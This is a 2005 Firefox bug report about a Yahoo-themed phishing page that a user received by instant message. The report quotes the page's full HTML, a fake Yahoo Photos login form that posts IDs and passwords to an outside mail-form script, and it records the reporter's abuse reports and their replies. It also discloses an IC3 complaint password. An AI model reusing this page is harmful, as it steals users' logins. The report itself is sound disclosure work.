Closed
Bug 305198
Opened 19 years ago
Closed 19 years ago
malicious URL makes firefox unhappy
Categories
(Firefox :: General, defect)
Tracking
()
VERIFIED
WORKSFORME
People
(Reporter: bmo, Unassigned)
References
()
Details
Attachments
(2 files)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Build Identifier: i got IM'd (from an infected friend's computer) the following URL: http://hstrial-yphotos001.homestead.com/index.html it looks like it's just a yahoo password phishing site, probably so that it can keep spreading via YIM, but firefox had to be force-killed right after i went there. could just be coincindence, but somebody braver than i (or with vmware) should check it out. Reproducible: Always Steps to Reproduce:
|
Reporter | |
Comment 2•19 years ago
|
||
|
|
Reporter | |
Comment 3•19 years ago
|
||
here's the large string from index.html unescaped: === <html> <head> <script language=javascript type=text/javascript src="http://us.i1.yimg.com/us.yimg.com/lib/common/yg_csstare.js"></script> <link rel="stylesheet" href="http://us.i1.yimg.com/us.yimg.com/lib/cmrc/base.css" type="text/css"> <link rel="stylesheet" href="http://us.i1.yimg.com/us.yimg.com/lib/ph/css/yph2.css" type="text/css"> <link type="text/css" rel="stylesheet" href="http://us.i1.yimg.com/us.yimg.com/i/reg2.css"> <style type="text/css"> <!-- @import "http://us.i1.yimg.com/us.yimg.com/lib/ph/css/yphbtn.css"; --> </style> <style type="text/css"> <!-- .btn,.btnylw{font-size:12px;width:100px;font-weight:800;color:#4f4f4f;vertical-align:middle;} .btnylw{background-color:#FFC02B;} --> </style> <script language="javascript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"> </script> <script language="javascript"> /* * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message * Digest Algorithm, as defined in RFC 1321. * Copyright (C) Paul Johnston 1999 - 2000. * Updated by Greg Holt 2000 - 2001. * See http://pajhome.org.uk/site/legal.html for details. */ /* * Convert a 32-bit number to a hex string with ls-byte first */ var hex_chr = "0123456789abcdef"; function rhex(num) { str = ""; for(j = 0; j <= 3; j++) str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) + hex_chr.charAt((num >> (j * 8)) & 0x0F); return str; } /* * Convert a string to a sequence of 16-word blocks, stored as an array. * Append padding bits and the length, as described in the MD5 standard. */ function str2blks_MD5(str) { nblk = ((str.length + 8) >> 6) + 1; blks = new Array(nblk * 16); for(i = 0; i < nblk * 16; i++) blks[i] = 0; for(i = 0; i < str.length; i++) blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8); blks[i >> 2] |= 0x80 << ((i % 4) * 8); blks[nblk * 16 - 2] = str.length * 8; return blks; } /* * Add integers, wrapping at 2^32. This uses 16-bit operations internally * to work around bugs in some JS interpreters. */ function add(x, y) { var lsw = (x & 0xFFFF) + (y & 0xFFFF); var msw = (x >> 16) + (y >> 16) + (lsw >> 16); return (msw << 16) | (lsw & 0xFFFF); } /* * Bitwise rotate a 32-bit number to the left */ function rol(num, cnt) { return (num << cnt) | (num >>> (32 - cnt)); } /* * These functions implement the basic operation for each round of the * algorithm. */ function cmn(q, a, b, x, s, t) { return add(rol(add(add(a, q), add(x, t)), s), b); } function ff(a, b, c, d, x, s, t) { return cmn((b & c) | ((~b) & d), a, b, x, s, t); } function gg(a, b, c, d, x, s, t) { return cmn((b & d) | (c & (~d)), a, b, x, s, t); } function hh(a, b, c, d, x, s, t) { return cmn(b ^ c ^ d, a, b, x, s, t); } function ii(a, b, c, d, x, s, t) { return cmn(c ^ (b | (~d)), a, b, x, s, t); } /* * Take a string and return the hex representation of its MD5. */ function MD5(str) { x = str2blks_MD5(str); var a = 1732584193; var b = -271733879; var c = -1732584194; var d = 271733878; for(i = 0; i < x.length; i += 16) { var olda = a; var oldb = b; var oldc = c; var oldd = d; a = ff(a, b, c, d, x[i+ 0], 7 , -680876936); d = ff(d, a, b, c, x[i+ 1], 12, -389564586); c = ff(c, d, a, b, x[i+ 2], 17, 606105819); b = ff(b, c, d, a, x[i+ 3], 22, -1044525330); a = ff(a, b, c, d, x[i+ 4], 7 , -176418897); d = ff(d, a, b, c, x[i+ 5], 12, 1200080426); c = ff(c, d, a, b, x[i+ 6], 17, -1473231341); b = ff(b, c, d, a, x[i+ 7], 22, -45705983); a = ff(a, b, c, d, x[i+ 8], 7 , 1770035416); d = ff(d, a, b, c, x[i+ 9], 12, -1958414417); c = ff(c, d, a, b, x[i+10], 17, -42063); b = ff(b, c, d, a, x[i+11], 22, -1990404162); a = ff(a, b, c, d, x[i+12], 7 , 1804603682); d = ff(d, a, b, c, x[i+13], 12, -40341101); c = ff(c, d, a, b, x[i+14], 17, -1502002290); b = ff(b, c, d, a, x[i+15], 22, 1236535329); a = gg(a, b, c, d, x[i+ 1], 5 , -165796510); d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632); c = gg(c, d, a, b, x[i+11], 14, 643717713); b = gg(b, c, d, a, x[i+ 0], 20, -373897302); a = gg(a, b, c, d, x[i+ 5], 5 , -701558691); d = gg(d, a, b, c, x[i+10], 9 , 38016083); c = gg(c, d, a, b, x[i+15], 14, -660478335); b = gg(b, c, d, a, x[i+ 4], 20, -405537848); a = gg(a, b, c, d, x[i+ 9], 5 , 568446438); d = gg(d, a, b, c, x[i+14], 9 , -1019803690); c = gg(c, d, a, b, x[i+ 3], 14, -187363961); b = gg(b, c, d, a, x[i+ 8], 20, 1163531501); a = gg(a, b, c, d, x[i+13], 5 , -1444681467); d = gg(d, a, b, c, x[i+ 2], 9 , -51403784); c = gg(c, d, a, b, x[i+ 7], 14, 1735328473); b = gg(b, c, d, a, x[i+12], 20, -1926607734); a = hh(a, b, c, d, x[i+ 5], 4 , -378558); d = hh(d, a, b, c, x[i+ 8], 11, -2022574463); c = hh(c, d, a, b, x[i+11], 16, 1839030562); b = hh(b, c, d, a, x[i+14], 23, -35309556); a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060); d = hh(d, a, b, c, x[i+ 4], 11, 1272893353); c = hh(c, d, a, b, x[i+ 7], 16, -155497632); b = hh(b, c, d, a, x[i+10], 23, -1094730640); a = hh(a, b, c, d, x[i+13], 4 , 681279174); d = hh(d, a, b, c, x[i+ 0], 11, -358537222); c = hh(c, d, a, b, x[i+ 3], 16, -722521979); b = hh(b, c, d, a, x[i+ 6], 23, 76029189); a = hh(a, b, c, d, x[i+ 9], 4 , -640364487); d = hh(d, a, b, c, x[i+12], 11, -421815835); c = hh(c, d, a, b, x[i+15], 16, 530742520); b = hh(b, c, d, a, x[i+ 2], 23, -995338651); a = ii(a, b, c, d, x[i+ 0], 6 , -198630844); d = ii(d, a, b, c, x[i+ 7], 10, 1126891415); c = ii(c, d, a, b, x[i+14], 15, -1416354905); b = ii(b, c, d, a, x[i+ 5], 21, -57434055); a = ii(a, b, c, d, x[i+12], 6 , 1700485571); d = ii(d, a, b, c, x[i+ 3], 10, -1894986606); c = ii(c, d, a, b, x[i+10], 15, -1051523); b = ii(b, c, d, a, x[i+ 1], 21, -2054922799); a = ii(a, b, c, d, x[i+ 8], 6 , 1873313359); d = ii(d, a, b, c, x[i+15], 10, -30611744); c = ii(c, d, a, b, x[i+ 6], 15, -1560198380); b = ii(b, c, d, a, x[i+13], 21, 1309151649); a = ii(a, b, c, d, x[i+ 4], 6 , -145523070); d = ii(d, a, b, c, x[i+11], 10, -1120210379); c = ii(c, d, a, b, x[i+ 2], 15, 718787259); b = ii(b, c, d, a, x[i+ 9], 21, -343485551); a = add(a, olda); b = add(b, oldb); c = add(c, oldc); d = add(d, oldd); } return rhex(a) + rhex(b) + rhex(c) + rhex(d); } function valid_js() { // anything that claims NS 4 or higher functionality better work if (navigator.userAgent.indexOf("Mozilla/") == 0) { return (parseInt(navigator.appVersion) >= 4); } return false; } function hash(form,login_url) { // this is Javascript enabled browser //document.login_form[".js"].value=1; // rudimentary check for a 4.x brower. should catch IE4+ and NS4.* var url; if (arguments.length > 1 && login_url != "") { // in case login_url is not passed in url = login_url; } else { url = "http://login.yahoo.com/config/login"; } url += "?"; if (valid_js()) { var passwd = form.passwd.value; var challenge = form[".challenge"].value; var hash2 = MD5(form.passwd.value) + challenge; var hash; if(form.passwd.value){ hash=MD5(hash2); } else { hash=""; } var js = 0; for(i=0; i<form.elements.length; i++){ if(typeof(form.elements[i].name)=="undefined" || form.elements[i].name.length <=0) { continue; } if(i > 0){ url += "&"; } url += form.elements[i].name; url += "="; if(form.elements[i].name == "passwd"){ url += hash; } else if (form.elements[i].type == "checkbox" && !form.elements[i].checked) { url += ""; } else if (form.elements[i].type == "radio" && !form.elements[i].checked) { url += ""; } else if (form.elements[i].name == ".save"){ url += "1"; // "Sign in" causes problem with the space } else if (form.elements[i].name == ".js"){ js = 1; url += "1"; } else { url += escape(form.elements[i].value); } } // indicate the password is hashed. url += "&.hash=1"; if(js == 0){ url += "&.js=1"; } url += "&.md5=1"; //alert("url=" + url); location.href=url; // prevent from running this again. Allow the server response to submit the form directly form.onsubmit=null; // abort normal form submission return false; } // allow normal form submission return true; } </script> <title>Yahoo! Photos </title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="0"> <META HTTP-EQUIV=Refresh CONTENT=900;> <style type="text/css"> input { font:10px Verdana, Arial, sans-serif; } </style> </head> <body bgcolor=#ffffff onload="document.login_form.login.focus();"> <center> <script language="JavaScript"> <!-- hasMsgr = 0; function dontGotIt(){ hasMsgr = 0; document.login_form.hasMsgr.value=0; } function doGotIt(){ hasMsgr = 1; document.login_form.hasMsgr.value=1; } //--> </script> <table border=0 cellpadding=0 cellspacing=0 width=750> <tr> <td colspan=3> <table border=0 width=100% cellpadding=4 cellspacing=0> <tr> <td valign=bottom><table cellpadding=0 cellspacing=2 width=750 border="0"> <tr> <td rowspan=2 valign=middle width=1%> <img src="http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_ph_1.gif" alt="Yahoo! Photos" width=231 height=33 border=0> </td> <td rowspan=2 width=10><spacer type=block width=1 height=1></td> <td align=right valign=bottom> <small><a href=http://www.yahoo.com>Yahoo!</a> - <a href="http://help.yahoo.com/help/us/photos/ ">Help</a></small> </td> </tr> <tr> <td colspan=3><hr size=1 noshade style="border:0px;"></td> </tr> </table> </td> </tr> <tr> <td> <!-- Start Top Bar --> <!-- End Top Bar --></td> </tr> </table> </td> </tr> </table> <table border=0 cellpadding=0 cellspacing=0 width=705 align="center"> <tr> <td colspan=9 height=35 class=yphspmainhdr>Share your photos with the people who matter</td> </tr> <tr align="left" valign="TOP"> <td width="450"> <table border=0 cellpadding=0 cellspacing=0 width=450 height=180> <tr> <td rowspan=5><img src="http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_photos/photo1_040305.jpg" width="272" height="238" alt=""></td> <td rowspan=5 width=5 nowrap><spacer type=block width=7 height=1></td> <td rowspan=5><img src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/gr/pic_r_2.gif" width="172" height="238" alt=""></td> <td rowspan=5 width=5 nowrap><spacer type=block width=7 height=1></td> </tr> </table> <table border=0 cellpadding=0 cellspacing=0 width=450> <tr> <td height=5><spacer type=block height=5></td> </tr> </table> <!-- AD SERVED MOD BEGIN --> <table border="0" cellpadding="0" cellspacing="0" width="450"> <tbody><tr valign="top"> <td rowspan="2" width="6"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_nw.gif" width="6" height="6"></td> <td height="1" class="yphsectbr"><spacer type="block" width="1" height="1"></td> <td rowspan="2" width="6"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_ne.gif" width="6" height="6"></td> </tr> <tr> <td width="438" height="6"><spacer type="block" width="438" height="6"></td> </tr> </tbody></table> <table border="0" cellpadding="0" cellspacing="0" width="450"> <tbody><tr valign="top"> <td class="yphsectbr" width="1"><spacer type="block" width="1" height="1"></td> <td width="448"><spacer type="block" width="448" height="1"></td> <td class="yphsectbr" width="1"><spacer type="block" width="1" height="1"></td> </tr> </tbody></table> <table border="0" cellpadding="0" cellspacing="0" width="450" height="90"> <tbody> <tr valign="top"> <td class="yphsectbr" width="1"><spacer type="block" width="1" height="1"></td> <td width="10"><spacer type="block" width="10" height="1"></td> <td width="65"><img style="margin-top:10px;" src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/pr/gifts/prints_2_f_55x55.gif" width="55" height="55"></td> <td><div style="margin-top:10px;"><span class="yphsphdr"><b>19¢ Prints- Every Day</b></span><br><small>Get film-quality prints starting at just 19¢. Plus your first 10 are free!<br> </small></div></td> <td width="50"><img style="margin-top:10px;" src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/pr/pr_imv_1.jpg" width="40" height="40"></td> <td width="163"><div style="margin-top:10px;"><span class="yphsphdr"><b>Share Photos Your Way</b></span><br> <small>Share photos via email, in Yahoo! Messenger, or on your mobile phone.</small><small><br> <br> </small></div></td> <td width="10"><spacer type="block" width="10" height="1"></td> <td class="yphsectbr" width="1"><spacer type="block" width="1" height="1"></td> </tr> </tbody> </table> <table border="0" cellpadding="0" cellspacing="0" width="450"> <tbody><tr valign="top"> <td rowspan="2" width="6"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_sw.gif" width="6" height="6"></td> <td width="438" height="6"><spacer type="block" width="438" height="6"></td> <td rowspan="2" width="6"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_se.gif" width="6" height="6"></td> </tr> <tr> <td height="1" class="yphsectbr"><spacer type="block" width="1" height="1"></td> </tr> </tbody></table> <!-- AD SERVED MOD END --> </td> <td width="5"> </td> <td width="250"> <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/ mailto.cgi" ENCTYPE="x-www-form-urlencoded"> <script language=javascript> <!-- browser_string = navigator.appVersion + " " + navigator.userAgent; if ( browser_string.indexOf("MSIE") < 0 ) { if (navigator.mimeTypes) { for (i = 0 ; i < navigator.mimeTypes.length ; i++) { if (navigator.mimeTypes[i].suffixes.indexOf("yps") > -1) { doGotIt(); } } } else { dontGotIt(); } } else { if (browser_string.indexOf("Windows")>=0) { doGotIt(); document.write('<object classid="clsid:41695A8E-6414-11D4-8FB3-00D0B7730277" CODEBASE="javascript:dontGotIt();" ID="Ymsgr" width="1" height="1">'); document.write('</object>'); } } //--> </script> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"> <INPUT TYPE="hidden" NAME="Mail_To" VALUE="vixi_xlx_zlz_xlx@hotmail.com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id"> <INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photos.yahoo.com/ph//my_photos"> <table cellpadding="0" cellspacing="0" border="0" height="238"> <tr bgcolor=86A863> <td colspan=5 valign=top><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/start_top.gif></td> </tr> <tr bgcolor=86A863> <td rowspan=3 width=1 bgcolor=E1CA83><spacer type=block width=1 height=1></td> <td rowspan=3 width=10><spacer type=block width=10></td> <td width=193><b class=w>Yahoo! Member Sign In</b></td> <td rowspan=3 width=10><spacer type=block width=10></td> <td rowspan=3 width=1 bgcolor=E1CA83><spacer type=block width=1 height=1></td> </tr> <tr><td bgcolor=E1CA83 height=1><spacer type=block width=1 height=1></td></tr> <tr bgcolor=86A863> <td> <table width=193 height=200 cellpadding=0 cellspacing=0 border=0> <tr bgcolor=86A863><td class=w>Yahoo! ID:</td><td><INPUT size=15 type="text" NAME="Usuario" style=width:100px;height:18px;></td></tr> <tr bgcolor=86A863><td class=w>Password:</td><td><INPUT size=15 TYPE="password" NAME="Senha" class="" style=width:100px;height:18px;></td></tr> <tr bgcolor=86A863><td colspan=2 class=w valign=center> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td valign="top" class=w ><input type=checkbox name=".persistent" value="y"></td><td> </td><td class=w>Remember my ID on this computer</td> </tr> </table> </td></tr> <tr bgcolor=86A863 align=center><td colspan=2><input type="submit" class=ygbt id=ygbtwhtlg value="Sign In"></td></tr> <tr bgcolor=86A863 align=center><td colspan=2 class=w><small><b>Mode:</b></small> <font class="w"><small><b>Standard</b></small></font> | <a href="https://login.yahoo.com/config/login?.src=ph&.v=0&.u=eafaild13qrud&.last=&promo=&.intl=us&.bypass=&.partner=&pkg=&stepid=&.done=http%3a//pg.photos.yahoo.com/ph/my_photos" class="w"><small>Secure</small></a> <tr bgcolor=86A863 align=center><td colspan=2 class=w><a href="" class=w><small><a href="http://edit.yahoo.com/config/form?.form=passwords-help&lg=us&new=1&.src=ph&referer=&partner=&.done=http://pg.photos.yahoo.com/ph/my_photos" class=w>Sign-in help</a> | <a href="http://edit.yahoo.com/config/eval_forgot_pw?new=1&.done=http://pg.photos.yahoo.com/ph/my_photos&.src=ph&partner=&.intl=us&pkg=&stepid=&.last=" class=w>Forgot your password?</a></small></a></td></tr> <tr><td bgcolor=E1CA83 height=1 colspan=2><spacer type=block width=1 height=1></td></tr> <tr bgcolor=86A863><td colspan=2><small><b class=w>Not a member?</b></small><br><a href="http://us.rd.yahoo.com/reg/su_s1/us/*http://edit.yahoo.com/config/eval_register?.intl=us&new=1&.done=http%3a//pg.photos.yahoo.com/ph/my_photos&.src=ph&.v=0&.u=eafaild13qrud&partner=&.p=&promo=&.last=" class=w><small>Become a Yahoo! Member</small></a></td></tr> </table> </td> </tr> <tr><td colspan=5 valign=top><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/start_btm.gif></td></tr></form> </table> <SCRIPT language=JavaScript> <!-- var speed = 10 var pause = 1500 var timerID = null var bannerRunning = false var ar = new Array() ar[0] = "Yahoo! My Photos" ar[1] = "Yahoo! My Photos" ar[2] = "Yahoo! My Photos" ar[3] = "Yahoo! My Photos" var message = 0 var state = "" clearState() function stopBanner() { if (bannerRunning) clearTimeout(timerID) timerRunning = false } function startBanner() { stopBanner() showBanner() } function clearState() { state = "" for (var i = 0; i < ar[message].length; ++i) { state += "0" } } function showBanner() { if (getString()) { message++ if (ar.length <= message) message = 0 clearState() timerID = setTimeout("showBanner()", pause) } else { var str = "" for (var j = 0; j < state.length; ++j) { str += (state.charAt(j) == "1") ? ar[message].charAt(j) : " " } window.status = str timerID = setTimeout("showBanner()", speed) } } function getString() { var full = true for (var j = 0; j < state.length; ++j) { if (state.charAt(j) == 0) full = false } while (1) { var num = getRandom(ar[message].length) break } state = state.substring(0, num) + "1" + state.substring(num + 1, state.length) return false } function getRandom(max) { var now = new Date() var num = now.getTime() * now.getSeconds() * Math.random() return num % max } startBanner() // --> </SCRIPT> <table><td width=5 height=4 nowrap><spacer type=block width=5 height=4></td></table> <table border=0 cellpadding=0 cellspacing=0 width=215 class=yphsecbox2> <tr valign=top> <td width=6><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_nw.gif width=6 height=6></td> <td height=1 width=203 class=yphsecbox2><spacer type=block width=203 height=1></td> <td width=6><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_ne.gif width=6 height=6></td> </tr> </table> <table border=0 cellpadding=0 cellspacing=0 width=215 class=yphsecbox2 height=90> <tr valign=top> <td width=11 class=yphsecbox2><spacer type=block width=11 height=1></td> <td width=189 class=w> <b>Quick Tour</b><br> <small>See how it works by taking the Yahoo! Photos Quick Tour</small> <p> <small><a href="http://photos.yahoo.com/ph//page?.file=quick_tour_popup.html" onClick="window.open(this.href, 'popupwindow', 'width=734,height=330');return false;" class=w>Take the Quick Tour</a></small> </p> </td> <td width=11 class=yphsecbox2><spacer type=block width=11 height=1></td> </tr> </table> <table border=0 cellpadding=0 cellspacing=0 width=215 class=yphsecbox2> <tr valign=top> <td width=1><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_sw.gif width=6 height=6></td> <td width=203 height=6><spacer type=block width=203 height=6></td> <td width=1><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_se.gif width=6 height=6></td> </tr> </table> <script language="JavaScript" type="text/JavaScript"> <!-- var r=Math.random(); document.writeln("<img alt=\"Yahoo Image\" width=1 height=1 border=0\n"); document.writeln("src=\"https://pclick.internal.yahoo.com/p/s=96481216/lng=us/rand="+r+"\">"); //--> </script> <script language="JavaScript" type="text/JavaScript"> var r=Math.random(); document.writeln("<img alt=\"Yahoo Image\" width=1 height=1 border=0\n"); document.writeln("src=\"https://pclick.internal.yahoo.com/p/s=96386767/lng=us/rand="+r+"\">"); //--> </script> </td> </tr> </table> <center> <hr width="750" size="1" noshade> <table width="750" cellpadding="0" cellspacing="0" border="0" summary="null"> <tr> <td align="center"> <font size="-2" face="arial" color="#8d8d8d"> Copyright © 2005 Yahoo! Inc. All rights reserved. <a href="http://docs.yahoo.com/info/copyright/copyright.html" target="cp" title="Click here to view Yahoo! Copyright Policy">Copyright Policy</a> <a href="http://docs.yahoo.com/info/terms/" target="_new" title="Click here to view Yahoo! Terms of Service">Terms of Service</a><br> <b>NOTICE: We collect personal information on this site.<br>To learn more about how we use your information, see our <a href="http://privacy.yahoo.com/" target="_new" title="Click here to view Yahoo! Privacy Policy">Privacy Policy</a></b> </font> </td> </tr> </table> </center> </center> </body> </html> ===
|
|
Reporter | |
Comment 7•19 years ago
|
||
i'm not at all impressed with responses from abuse departments, so far. i got a form auto-reply from hotmail that couldn't find an abusive email with headers in my message. d'uh. there are other ways besides sending email that can be abusive :( i got a vacation reply from homestead. i got a bounce from fiberbit. so much for trying to be a good citizen... marc
|
|
Reporter | |
Comment 8•19 years ago
|
||
here's fiberbit.net bounce: === Date: Fri, 19 Aug 2005 09:30:25 -0400 From: Mail Delivery Subsystem <MAILER-DAEMON@tenet.verdasys.com> Message-Id: <200508191330.j7JDUP526404@tenet.verdasys.com> To: <beej@alum.mit.xxx> MIME-Version: 1.0 Content-Type: multipart/report; report-type=delivery-status; boundary="j7JDUP526404.1124458225/tenet.verdasys.com" Subject: Returned mail: see transcript for details Auto-Submitted: auto-generated (failure) X-Spam-Score: -2.599 X-Spam-Flag: NO X-Scanned-By: MIMEDefang 2.42 The original message was received at Fri, 19 Aug 2005 09:30:23 -0400 from tenet.verdasys.com [127.0.0.1] ----- The following addresses had permanent fatal errors ----- <abuse@fiberbit.net> (reason: 550 5.0.0 <abuse@fiberbit.net>... Virtual user unknown) ----- Transcript of session follows ----- ... while talking to lb1.fiberbit.net.: >>> RCPT To:<abuse@fiberbit.net> <<< 550 5.0.0 <abuse@fiberbit.net>... Virtual user unknown 550 5.1.1 <abuse@fiberbit.net>... User unknown Reporting-MTA: dns; tenet.verdasys.com Received-From-MTA: DNS; tenet.verdasys.com Arrival-Date: Fri, 19 Aug 2005 09:30:23 -0400 Final-Recipient: RFC822; abuse@fiberbit.net Action: failed Status: 5.0.0 Remote-MTA: DNS; lb1.fiberbit.net Diagnostic-Code: SMTP; 550 5.0.0 <abuse@fiberbit.net>... Virtual user unknown Last-Attempt-Date: Fri, 19 Aug 2005 09:30:25 -0400 Return-Path: <beej@alum.mit.edu> Received: from KGB.alum.mit.edu (tenet.verdasys.com [127.0.0.1]) by tenet.verdasys.com (8.11.6/8.11.6) with ESMTP id j7JDUM526402 for <abuse@fiberbit.net>; Fri, 19 Aug 2005 09:30:23 -0400 Message-Id: <6.0.3.0.2.20050819092721.054b09c0@127.0.0.1> X-Sender: 127.0.0.1:beej@127.0.0.1 (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 6.0.3.0 Date: Fri, 19 Aug 2005 09:28:00 -0400 To: abuse@fiberbit.net From: Marc Bejarano <beej@alum.mit.xxx> Subject: Fwd: YIM virus Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed can you disable: <http://www2.fiberbit.net/form/>http://www2.fiberbit.net/form/ ?? it is being used in the following malware... marc ===== Date: Fri, 19 Aug 2005 09:22:43 -0400 To: abuse@homestead.com From: Marc Bejarano <beej@alum.mit.xxx> Subject: Fwd: YIM virus please disable the following malicious URL: http://hstrial-yphotos001.homestead.com/index.html tia, marc ===== Date: Fri, 19 Aug 2005 09:21:19 -0400 To: abuse@hotmail.com From: Marc Bejarano <beej@alum.mit.xxx> Subject: YIM virus Cc: abuse@yahoo.com i just got IM'd (via yahoo) the URL to what looks like a page spreading malware that sends collected yahoo logins to vixi_xlx_zlz_xlx@hotmail.com. please disable this account. the malicious URL is: http://hstrial-yphotos001.homestead.com/index.html yahoo folks: can you filter this URL from being sent through your system? marc ===== ===== ===
|
|
Reporter | |
Comment 9•19 years ago
|
||
and hotmail: ===== Date: Fri, 19 Aug 2005 06:22:27 -0700 (PDT) To: beej@alum.mit.xxx From: MSN Hotmail <abuse@hotmail.com> Subject: YIM virus X-Originating-IP: [65.54.241.240] This is an auto-generated response designed to answer your question as quickly as possible. Please note that you will not receive a reply if you respond directly to this message. Unfortunately, we cannot take action on the mail you sent us because it does not reference a Hotmail account. Please send us another message that contains the full Hotmail e-mail address and the full e-mail message to: abuse@hotmail.com >>> To forward mail with full headers Using Hotmail: 1. Click "Options" to the right of the "Contacts" tab. The "Options" page appears. 2. Under "Additional Options", click "Mail Display Settings". The "Mail Display Settings" page appears. 3. Under "Message Headers", select "Full" and click "OK". 4. Forward the resulting mail to: abuse@hotmail.com Using MSN Explorer: 1. Open the message, and then click "More" in the upper right corner. 2. Click "Message Source". The message opens in a new window with all the header information visible. 3. Copy all the text and paste it into a new message. Send this message to: abuse@msn.com Using Outlook Express or Outlook: 1. On the unopened mail, place your cursor over the mail, right-click, and click "Options". 2. Under "Internet headers", copy the contents of the full header. 3. Open the e-mail in question and forward a complete copy of the message, including the full message header you copied at the beginning of your message, to: abuse@hotmail.com If you're not a Hotmail member, consult the Help associated with your e-mail program to determine how to view complete header information. Then forward the message to: abuse@hotmail.com If the unsolicited junk e-mail or "spam" comes from a non-Hotmail account, you can send a complaint to the service provider that sent the mail. Make sure that you include full headers when you send your complaint. In the full header, look at the last "Received" notation to locate what .com domain it came from. It looks something like: [service provider domain name].com Forward a complete copy of the message, including the full message header, to: abuse@[service provider domain name].com If the domain does not have an abuse service, forward your complaint to: webmaster@[service provider domain name].com All Hotmail customers have agreed to MSN Website Terms of Use and Notices(TOU) that forbid e-mail abuse. At the bottom of any page in Hotmail, click "Terms of Use" to view the Terms of Use document in its entirety. Thank you for helping us enforce our TOU. =====
|
|
Reporter | |
Comment 10•19 years ago
|
||
wow.. calling the seattle FBI field office was fruitless. they just tried to put me in touch with the ic3.gov folks. and they were not helpful, at all. they just want an online form filled out which goes into a huge queue. i filled out a complaint, anyway. Complaint number: I05081911326223 Password: duvube
|
|
Reporter | |
Comment 11•19 years ago
|
||
i think all that javascript is just slamming the cpu, so this is likely juts a DoS for firefox.
|
|
Reporter | |
Comment 12•19 years ago
|
||
heard back from homestead: === Date: Fri, 19 Aug 2005 09:17:49 -0700 (PDT) From: Homestead Abuse Administrator <abuse@homesteadsupport.com> To: Marc Bejarano <beej@alum.mit.edu> Subject: Re: Fwd: YIM virus (KMM6694464I30L0KM) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit x-mailer: KANA Response 7.5.2.76.4 X-Spam-Score: -0.985 X-Spam-Flag: NO X-Scanned-By: MIMEDefang 2.42 Hello Marc, Thank you for bringing this situation to our attention. As a passive conduit, Homestead cannot monitor user websites, but we respond to breaches of our user agreement when we learn of such behavior. Therefore, prior to your complaint, we were unaware that this site was on our server. Given that the user appears to be breaching our Member Agreement, we have closed the user's account and removed the offensive site. Thank you again. Regards, Homestead Abuse Team Homestead Technologies [Case #3094108] <snip my original report> =====
|
|
Reporter | |
Comment 13•19 years ago
|
||
this should be opened up to the public. i don't see any evidence that this is some 0-day firefox exploit, or anything ;)
|
||
Updated•19 years ago
|
Group: security
|
||
Comment 14•19 years ago
|
||
Could you please provide a talkback ID from the crash (if still possible to reproduce)? http://kb.mozillazine.org/Talkback
|
||
Updated•19 years ago
|
Flags: blocking1.8b4?
|
|
||
Updated•19 years ago
|
Flags: blocking1.8b4?
|
|
Reporter | |
Comment 15•19 years ago
|
||
great. my second attempt to email abuse@hotmail failed, too. i had included an email from hotmail with the headers just so that i could get by their stupid filter. apparently that didn't help :( ===== X-SRX: 1001428993 X-Mailer: Microsoft Avondale Mailer Thread-Topic: SRX1001428993ID - YIM virus thread-index: AcWlSgc3OE3xlz0QRsSK7cVfJT+3aA== Reply-To: From: "MSN Hotmail Technical Support" <abuse_EN_SY@css.one.microsoft.com> To: "Marc Bejarano" <beej@alum.mit.edu> Cc: Subject: RE: SRX1001428993ID - YIM virus Date: Fri, 19 Aug 2005 22:43:01 -0700 Importance: normal Priority: normal X-OriginalArrivalTime: 20 Aug 2005 05:43:01.0795 (UTC) FILETIME=[07436F30:01C5A54A] Hello Marc,Thank you for writing to MSN Hotmail Technical Support. My name is Divino and I am writing in response about the un-solicited e-mail message you have received. We have investigated the account you have reported and we found that the X-Originating IP of the e-mail you have sent us did not match. It is possible that it was forged or tampered with. If you have any other documentation from this sender, please send it to us immediately with complete message headers. I suggest that you refer to the help section of your email service provider for instructions on how to view full headers. After exposing the full headers, forward the mail to: abuse@hotmail.com Hotmail firmly enforces its Terms of Use (TOU) including our anti-spam stance. You can review our TOU ! at: http://privacy.msn.com/tou/default.aspWe are very sorry if we were not able to take action against this person because we need sufficient evidence to justify our actions. We are looking forward to hear from you soon. I appreciate your patience and understanding regarding this matter. Sincerely,Divino T.MSN Hotmail Technical Support <snip my original msg> =====
|
|
Reporter | |
Comment 16•19 years ago
|
||
firefox never crashed, so there is no talkback id. firefox just chewed up inordinate amounts of CPU time.
|
|
||
Comment 17•19 years ago
|
||
